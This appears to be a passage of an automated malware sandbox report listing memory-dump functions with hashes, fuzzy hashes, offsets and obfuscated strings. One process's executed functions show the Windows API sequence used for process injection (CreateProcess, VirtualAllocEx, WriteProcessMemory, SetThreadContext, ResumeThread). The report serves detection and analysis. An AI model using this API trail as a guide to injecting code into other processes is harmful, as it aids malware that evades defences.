                    • Opcode ID: 64e9231c63f79c6226138dc8ee452a507f68f6ee4ca5cadaa3ae3e02395ef4cc
                    • Instruction ID: 2487e4f45e5577901ce8eb21867489f83c5f9eadea5bd20390fc12507aac263b
                    • Opcode Fuzzy Hash: 64e9231c63f79c6226138dc8ee452a507f68f6ee4ca5cadaa3ae3e02395ef4cc
                    • Instruction Fuzzy Hash: D1D0C934108A04DF8E1CAAE5D4C8E35BB78BA463153304C5DD00B4A253D627E842DA48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8706fca741ab6c8fe64fd626072af31220bc50aae1cba216c65350316800430
                    • Instruction ID: 4fdc92fab4bd1ff73c613e905c95fec6849eef8c01a19d669fa997f3ff3f6624
                    • Opcode Fuzzy Hash: b8706fca741ab6c8fe64fd626072af31220bc50aae1cba216c65350316800430
                    • Instruction Fuzzy Hash: 0AC04C36A044198EEB009BD4F8493ECBB60F780329F104067D21D5154196B505959691
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 16b2ad6b5142bb16ca5c6b2cad53a1dae6945eb3fc74aaaf7232ff503ad0d6a7
                    • Instruction ID: 80c00bd8fc765207768969196a5157c9a9d6b39fca6f8f5256aa05e88df32e46
                    • Opcode Fuzzy Hash: 16b2ad6b5142bb16ca5c6b2cad53a1dae6945eb3fc74aaaf7232ff503ad0d6a7
                    • Instruction Fuzzy Hash: 2DB0123014830C8B890033F6240D61C3B4C2FD0114B801414B54F43E41DD5CA4C1126F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.2379827098.00000000005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 960029225f95f5f0cb1212dedcb2cfa0d4cae7db85fef9010b5cd0dd5ed4622f
                    • Instruction ID: 87d12823abeedaff8a405c37d2e5d88b321ffc577013e52d95791098ea955a7b
                    • Opcode Fuzzy Hash: 960029225f95f5f0cb1212dedcb2cfa0d4cae7db85fef9010b5cd0dd5ed4622f
                    • Instruction Fuzzy Hash: D3B09B30005319DFC145ABD5D995D957A5CB5016503501D15D602020555F992D4556D5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Executed Functions

                    APIs
                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003FB307
                    Memory Dump Source
                    • Source File: 00000009.00000002.2204655277.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 4f6de2ceb47755006f657fec647e27049e3564fd8975708e43d6861581ad859b
                    • Instruction ID: 9cfb78de30d2276d70c04843e193661a941baf1f45500d6b298c560970ffba40
                    • Opcode Fuzzy Hash: 4f6de2ceb47755006f657fec647e27049e3564fd8975708e43d6861581ad859b
                    • Instruction Fuzzy Hash: D0C134B0D0021D8FDB21CFA5C845BEEBBB1BF49304F1095AAD949B7250EB749A85CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003FAD8B
                    Memory Dump Source
                    • Source File: 00000009.00000002.2204655277.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: b5d0146960af8e71e1793164e06705f2b129550893502a40b22266698829055c
                    • Instruction ID: 2fd3542f4a70ef40f483550255c8da4e0468cada39ef87d0ece164649bce6c1b
                    • Opcode Fuzzy Hash: b5d0146960af8e71e1793164e06705f2b129550893502a40b22266698829055c
                    • Instruction Fuzzy Hash: 4241BAB4D012189FCF00CFA9D984AEEFBF5BB49304F24942AE918B7210D774AA45CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003FAEC2
                    Memory Dump Source
                    • Source File: 00000009.00000002.2204655277.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: 81cad33a1409119a31b6b629fce6012a6d11e6fdcce6a938319d35bf04bd5977
                    • Instruction ID: 5b2efcb0032715bd89c6e5264b7fb6c6d790edd5bcd66ab4482cf79079285678
                    • Opcode Fuzzy Hash: 81cad33a1409119a31b6b629fce6012a6d11e6fdcce6a938319d35bf04bd5977
                    • Instruction Fuzzy Hash: 8141BAB8D002589FCF00CFE9D884AEEFBB5BB19314F14A82AE914B7210D774AA45CF55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 003FAEC2
                    Memory Dump Source
                    • Source File: 00000009.00000002.2204655277.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: 5a90f2cda1344ecab19d0271c62c3d81ec7dc0a87261ee26f4682cc780e834d4
                    • Instruction ID: 8ca594fc96f8f78bebe8912b2450dffed63eaeec8d8848d11f72beb7c2d5b25c
                    • Opcode Fuzzy Hash: 5a90f2cda1344ecab19d0271c62c3d81ec7dc0a87261ee26f4682cc780e834d4
                    • Instruction Fuzzy Hash: CA41AAB8D002589FCF10CFE9D884AEEFBB5BB19314F14942AE914B7210D774A945CF65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 003FAC42
                    Memory Dump Source
                    • Source File: 00000009.00000002.2204655277.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: ea16feb579bb7dbccd02d78e0a6819ee83210ca3c7be6b2ac917d2dd134b9a25
                    • Instruction ID: 3604a8ae8afbdfab716b2ed8245ea989da62726b57cb18005b800271bdf92532
                    • Opcode Fuzzy Hash: ea16feb579bb7dbccd02d78e0a6819ee83210ca3c7be6b2ac917d2dd134b9a25
                    • Instruction Fuzzy Hash: 9F31A8B8D002589FCF10CFA9D884AEEFBB5BB49310F14A82AE915B7310D775A941CF55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 003FAB1F
                    Memory Dump Source
                    • Source File: 00000009.00000002.2204655277.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 902a96c6cf351832d760eadba4b9a96d8d0c5f2d0dff0bcf512ccae8a471f7a8
                    • Instruction ID: aa3637706b982528bf0cf209ad9c9c08346359df667b43fbf1e620cf65021bf5
                    • Opcode Fuzzy Hash: 902a96c6cf351832d760eadba4b9a96d8d0c5f2d0dff0bcf512ccae8a471f7a8
                    • Instruction Fuzzy Hash: 0341C9B4D012589FDB10CFA9D884AEEFBF1AF49314F24942AE418B7240D778AA85CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 003FAB1F
                    Memory Dump Source
                    • Source File: 00000009.00000002.2204655277.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 58201d5376056fc557311e3431bed0324debed97ba6c2054e52e6b1ff66cd864
                    • Instruction ID: e07e52d665c6b12fbe025cc26508580592efce0f121c6905580928d237299b3a
                    • Opcode Fuzzy Hash: 58201d5376056fc557311e3431bed0324debed97ba6c2054e52e6b1ff66cd864
                    • Instruction Fuzzy Hash: 8E31BAB4D012589FCB10CFA9D884AEEFBF5BF49314F24942AE518B7240D778AA45CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ResumeThread.KERNELBASE(?), ref: 003FA9FE
                    Memory Dump Source
                    • Source File: 00000009.00000002.2204655277.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 96b25fa8ea67bff334ff3e2bd918ce3ff0528320907716d29334ca7634a57892
                    • Instruction ID: 399779412ca651e35ebc148e0d596ec75fc065c04272381adc6582b3f60d9100
                    • Opcode Fuzzy Hash: 96b25fa8ea67bff334ff3e2bd918ce3ff0528320907716d29334ca7634a57892
                    • Instruction Fuzzy Hash: E831CCB4D012189FCF10CFA9D884AEEFBB4AF49314F14982AE915B7310D774A905CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000009.00000002.2204566273.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab758384b02c554eb5f5d78fbf97e33715824b859abfcc4ca301adaa2b2cbb16
                    • Instruction ID: b544a4a052a3dc8fb92173fe7784cd78f48876d1b841588efa21be9d456719a2
                    • Opcode Fuzzy Hash: ab758384b02c554eb5f5d78fbf97e33715824b859abfcc4ca301adaa2b2cbb16
                    • Instruction Fuzzy Hash: C6212574204304DFDB14CF94E884B16BB65EB84314F34C969E88E4B38AC376D857CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000009.00000002.2204566273.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
                    • Instruction ID: 2c2f70d9550787b18d4e52f50fc50241a6b3a63d250aca1118b3e520be5be5b6
                    • Opcode Fuzzy Hash: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
                    • Instruction Fuzzy Hash: EE11BE75504280CFCB11CF50E584B16BB61FB44314F28C6A9E8494B69AC37AD84ACB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000009.00000002.2204552623.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8834627d98273180626b78c6ef9b7915843dd62f497ad521a4690a005278b106
                    • Instruction ID: 31a64ff0aadbb750dd455c5f93c63540f83dc728a43a1e6879c2a62b9d247b73
                    • Opcode Fuzzy Hash: 8834627d98273180626b78c6ef9b7915843dd62f497ad521a4690a005278b106
                    • Instruction Fuzzy Hash: B901A771004348AAE7A09B96C8887BBFBDDEF51724F18C55BEE055B683C774D840E6B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000009.00000002.2204552623.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f49761c4e0372dd8470aa530f9d5172bc564f9dbf42fa7af3d97df21da2be7ee
                    • Instruction ID: 02fad78f57eb604c92dabed25b5fc6bb6500374e67ac807a2bebac0baff0b015
                    • Opcode Fuzzy Hash: f49761c4e0372dd8470aa530f9d5172bc564f9dbf42fa7af3d97df21da2be7ee
                    • Instruction Fuzzy Hash: E2F0C2714043449AE7608A46C888B63FFD8EF61324F18C45AED085B686C3789C40DBB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Executed Functions

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: (F*m$:hu'$d
                    • API String ID: 0-1469194103
                    • Opcode ID: 06ccabf4e1c1dbd7f24feaeab89f95dcf3d86d0d10f1f094ba5831b1be248180
                    • Instruction ID: 5783d5d8d4847318b98066568734ecf08e2ee8b882553b292160a940638940af
                    • Opcode Fuzzy Hash: 06ccabf4e1c1dbd7f24feaeab89f95dcf3d86d0d10f1f094ba5831b1be248180
                    • Instruction Fuzzy Hash: 1712E274A04209CFC716DFA5D48867EBBF2FF88305F25842AE2169B765DB349A84CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: t*m
                    • API String ID: 0-617549879
                    • Opcode ID: 199287f34b43193dab0d33c8e4418afb77ea60e2cdb0d3a8febbdfb96d0a7c42
                    • Instruction ID: e7d0d281b643ca6dc2d4675ffa19365e6b1e6cf2817ddf6c7f8cc336f741f632
                    • Opcode Fuzzy Hash: 199287f34b43193dab0d33c8e4418afb77ea60e2cdb0d3a8febbdfb96d0a7c42
                    • Instruction Fuzzy Hash: 5481AB31F051188FD714DBA9D880AAEB7E3AFC8314F2A8565E605EB769DF709D41CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1fec3d424a5398d8be48670739ae197f9df7017a12a51bda14db645ed14fda71
                    • Instruction ID: dad2c9bdc3c0f6bd95b1db63ec0fa3c26636a49ff8e4be32c97d27f84dbbe0aa
                    • Opcode Fuzzy Hash: 1fec3d424a5398d8be48670739ae197f9df7017a12a51bda14db645ed14fda71
                    • Instruction Fuzzy Hash: 42615B32F155148FD714DB69C980BAEB3E3AFC8314F2A8565E509EB369DE70AD41CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: d$n+D
                    • API String ID: 0-3225976883
                    • Opcode ID: 6ba87362272d876ff3c9576fee4ac0664418cf1c6be4f463c5f7b6bf1b79530c
                    • Instruction ID: 2bf39b621b891e9a80bc7fdd92071809ad3b53aee2387947e30fe93731381306
                    • Opcode Fuzzy Hash: 6ba87362272d876ff3c9576fee4ac0664418cf1c6be4f463c5f7b6bf1b79530c
                    • Instruction Fuzzy Hash: 0CB1A571A002098FCB15DF68C4845A9FBB2FF84314B55CAAAD949DF256DB30ED82CBD4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: (F*m$r*+
                    • API String ID: 0-2910855618
                    • Opcode ID: 067755b04e0a313c393578bc54b058b32294ed099d21c72ff88bc8cda9c5c88e
                    • Instruction ID: 9d391d49d2ebd88b8161c0146821843e58eab68ad089d9915be47bdfbe16c7e4
                    • Opcode Fuzzy Hash: 067755b04e0a313c393578bc54b058b32294ed099d21c72ff88bc8cda9c5c88e
                    • Instruction Fuzzy Hash: 8161F6B8A4020E9FDF15DFAAD8849BDBBF1BF48304F10A565E506EB260DB319A41CF11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: TV*m$|Iel
                    • API String ID: 0-3006535421
                    • Opcode ID: cffd1d1307f2a0901223f61e9778e4024cb46c63e077a6bf0586fee4af0c1a87
                    • Instruction ID: b9e06cc641b4f3d9456946065f34e5f93f0a708028546565d71f641f0653ab84
                    • Opcode Fuzzy Hash: cffd1d1307f2a0901223f61e9778e4024cb46c63e077a6bf0586fee4af0c1a87
                    • Instruction Fuzzy Hash: 32616C74A00218CFC755DF68D498BADB7B1FF49304F2185A9E60AAB365DB70AE85CF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: :hu'$d
                    • API String ID: 0-2489681624
                    • Opcode ID: 1fbb0ef060c669c155343e5a6d35e12ec9bfd9159bd6d78a8e707e3fc3ca954a
                    • Instruction ID: bda647eaf3adb6ae3b574369b31f862d4b3305120482cfd9eff832fd9a514234
                    • Opcode Fuzzy Hash: 1fbb0ef060c669c155343e5a6d35e12ec9bfd9159bd6d78a8e707e3fc3ca954a
                    • Instruction Fuzzy Hash: 9F316934910309CFCB15DFA5E449AAEBBF2FF49318F15C42AC10AAB665D7749A88CF01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: TV*m
                    • API String ID: 0-1366475814
                    • Opcode ID: 8c35317ea0fb107dd8ad39979cbe5e2aeadf1623f8fcd943ff84890a234bdca3
                    • Instruction ID: f4dd4865b9cee9922a0afc736833bb259c6498d543d79d586bc806035d6c4f22
                    • Opcode Fuzzy Hash: 8c35317ea0fb107dd8ad39979cbe5e2aeadf1623f8fcd943ff84890a234bdca3
                    • Instruction Fuzzy Hash: 9A123978A04204CFC706EF68D098969B7B5FF8D304B2680ADEA069B769CB71ED05CF51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: @2*m
                    • API String ID: 0-3252119314
                    • Opcode ID: 11cb9911e06a4f0f838905cc7abb5a09e81cb6d76ce2aec54fefc27fa6068348
                    • Instruction ID: 5b62d7d8412e3c5f6ad474454c208783342dea05a81a106aef05f0e8a8bcbf09
                    • Opcode Fuzzy Hash: 11cb9911e06a4f0f838905cc7abb5a09e81cb6d76ce2aec54fefc27fa6068348
                    • Instruction Fuzzy Hash: 6C511834B042088FCB09DBADC4546BEB7F6EF85310F2540A9DA05EB396DB71AC45CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID: 0-3916222277
                    • Opcode ID: 5ec4da498c9fe842ae4c3a0dfc28fab4a67c5db3f567d4dba085de2c5bb78d41
                    • Instruction ID: e7f18e20aebf7c7ff7c072af3ca571c67c8d0520f2c343afeacefb840d21e5df
                    • Opcode Fuzzy Hash: 5ec4da498c9fe842ae4c3a0dfc28fab4a67c5db3f567d4dba085de2c5bb78d41
                    • Instruction Fuzzy Hash: 4841E531B0810C9FDB11DBD9DC840BFBB66EBC0325B298976E615DBB12D331D8828791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: ,/+m
                    • API String ID: 0-3183619787
                    • Opcode ID: d0ffd9d6c837d6b35171ff3e8fbd864b15d7bfeb0af34713da255d6493daf81c
                    • Instruction ID: 7187b48e11e3246a004b723c52729dead44e934b491b617508726c759c3e3e81
                    • Opcode Fuzzy Hash: d0ffd9d6c837d6b35171ff3e8fbd864b15d7bfeb0af34713da255d6493daf81c
                    • Instruction Fuzzy Hash: 21416C302002448FC719BFB8F81C67E3BA1BF853457118969E202CBA76DF749D86CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: (F*m
                    • API String ID: 0-1824356466
                    • Opcode ID: 99697e7f45f00a59520af87aef5c1a989d1a7c9d8f198172bf59f870e6de939a
                    • Instruction ID: eb7a8295d41fb8f01200be1569bea0474b117fe38d632bb5c73c9a5580542d3d
                    • Opcode Fuzzy Hash: 99697e7f45f00a59520af87aef5c1a989d1a7c9d8f198172bf59f870e6de939a
                    • Instruction Fuzzy Hash: D021F2397480188FC726CB78D85497A77E9EF8871431A45BBE64BCBB71EB20DC118B52
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: |&+m
                    • API String ID: 0-2032016102
                    • Opcode ID: 0ce24e1f89b774176a21ec79280020672e623e32f598863bf2740f1b09dcc4da
                    • Instruction ID: ea6d2446467501a7518031b462b1a9e35ba100e6b0f96c296a073047ccef3813
                    • Opcode Fuzzy Hash: 0ce24e1f89b774176a21ec79280020672e623e32f598863bf2740f1b09dcc4da
                    • Instruction Fuzzy Hash: 64212B71A0420ADFCB01DBE0E9445FEF7B9FF49314B114526D306A7650DF329940C7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 39485917b1a6c5d23d15010074d33f7a5b585b71c2b17830c6de7be4d434f399
                    • Instruction ID: b1592d372da1da110ec424c6bb03b1c9b83f0a3fc3d66ea23c12b46ea251e394
                    • Opcode Fuzzy Hash: 39485917b1a6c5d23d15010074d33f7a5b585b71c2b17830c6de7be4d434f399
                    • Instruction Fuzzy Hash: 45B1F931E04209DFCB06DFA8C8805FEBBB6FF99304B258566E606AB255DB31DD81CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3484599c329c6eb33c293bb41ac05cc23f5af64f23a1d4c119869e6453e2cfb5
                    • Instruction ID: ae14bee202c94fbdf5e663820c61bd8c456c347ca3e5b42370245bacce56fb06
                    • Opcode Fuzzy Hash: 3484599c329c6eb33c293bb41ac05cc23f5af64f23a1d4c119869e6453e2cfb5
                    • Instruction Fuzzy Hash: E5512131F081588FCB21DBA8C8841BF77A2EBC5314729857AD71ADB752EB31DC068792
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ba876fec464be10648a184532a1407ce655b907927266ca623b9181b644e9bb5
                    • Instruction ID: d01b3826dc10787e4ebd74b74853d63afb44ece969234e41398388dd4640054a
                    • Opcode Fuzzy Hash: ba876fec464be10648a184532a1407ce655b907927266ca623b9181b644e9bb5
                    • Instruction Fuzzy Hash: 5151F435B00208DFCB16DB68E854ABAB7B6AFC9350B298559DA06DB761DF30DC01CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7b5dca734264e99c8d9698d3fa3c485bdf43e59ab585ed9b1ed022530dfb68cc
                    • Instruction ID: 4432ed67f5a0fe81dca1adbdbf0bd1e325fd54d63e80b8c98b9036ac44364bd2
                    • Opcode Fuzzy Hash: 7b5dca734264e99c8d9698d3fa3c485bdf43e59ab585ed9b1ed022530dfb68cc
                    • Instruction Fuzzy Hash: C9411930A0C3999FC712D778989447EFFF59F82314B1545ABD346CBAA2CB218D45C752
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8a11756c2566cca3fc7f9ffce3de2db00024df587d0b8cb49c2e3ecf126818f6
                    • Instruction ID: 9e7d8caf5b2c423ba430d57a3e73a80faecf41a5bbc4684c6826f5a894d479d6
                    • Opcode Fuzzy Hash: 8a11756c2566cca3fc7f9ffce3de2db00024df587d0b8cb49c2e3ecf126818f6
                    • Instruction Fuzzy Hash: 49412831B00208CFCB15DB69D4549B9B7B6EF89300B25C69AE606EB361DF71EC41C791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eb0391bd0af157a456489c5a7b5ff4897da71b6563823fa7ea588cc8cbbc50b8
                    • Instruction ID: 1e5082427d48410d17532b96e5fb1705874eaa4b327cd0ed84d5c38c141b5218
                    • Opcode Fuzzy Hash: eb0391bd0af157a456489c5a7b5ff4897da71b6563823fa7ea588cc8cbbc50b8
                    • Instruction Fuzzy Hash: F9416E346002048FD719DB69C594BBEB7F6EF89350F2540A9DA02AB3A2DB71EC41CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217267879.00000000001FD000.00000040.00000001.sdmp, Offset: 001FD000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bd21fecf03ba78734433eac6e1c7b5fc234b79fbc2dc5df32cfca9756c077f7
                    • Instruction ID: e5d0f135e0a73c584ae9ab2c341f259f626a98a073f9c6c4580a289bab12e8cf
                    • Opcode Fuzzy Hash: 4bd21fecf03ba78734433eac6e1c7b5fc234b79fbc2dc5df32cfca9756c077f7
                    • Instruction Fuzzy Hash: 0D213774204308DFDB14CF54E484B36BB66EB84314F34C969EA0A4B346CB36D857CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217267879.00000000001FD000.00000040.00000001.sdmp, Offset: 001FD000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a6dc1ba486640293eeaa464e018ee30e0ea7854429cd0c105fb3f7bbb8a8f39
                    • Instruction ID: 0db179b9ca0d048971c4693ecf29d843f89c937e2f4de47777abd59e22e3511b
                    • Opcode Fuzzy Hash: 0a6dc1ba486640293eeaa464e018ee30e0ea7854429cd0c105fb3f7bbb8a8f39
                    • Instruction Fuzzy Hash: 87210775504208DFDB15CF54E5C4B36BB66FB84314F24C96DEA094B346C336D856CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 75ddad95c2fc2fd2176e03eb750bdb88bbd9ef4205003a11a7a937b32dfea030
                    • Instruction ID: bcebd2dd6c8109a24013bdd00446a398ab9b67b7f561c453c48f12c54b023df2
                    • Opcode Fuzzy Hash: 75ddad95c2fc2fd2176e03eb750bdb88bbd9ef4205003a11a7a937b32dfea030
                    • Instruction Fuzzy Hash: 1F11A034358144CFC346DB28D898C693BB9AF8A71032645EAE206CB772CA61DC06CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dfb9f816c0b00886f4cf5dace990c94bb9422f63f960ff03d4bbaecfc70055c4
                    • Instruction ID: 9fe1b8a661754c3daf75f89b38c7debd5bd84e438559c8e65586a0b9d6429e93
                    • Opcode Fuzzy Hash: dfb9f816c0b00886f4cf5dace990c94bb9422f63f960ff03d4bbaecfc70055c4
                    • Instruction Fuzzy Hash: 59211974A1020E8BCF09EFA9E9945BDB7B5FF48304B104825E606E7651DB31AE45CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 0000000C.00000002.2217296115.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93326ad3f4d509279cef7faf7454ceadbef35959ab32bc4ac483284578536593
                    • Instruction ID: 57b21cdd0d678f73215dacd6c3ab9b5723d46d47d1ee0b1da0175f8de1bfaa5d
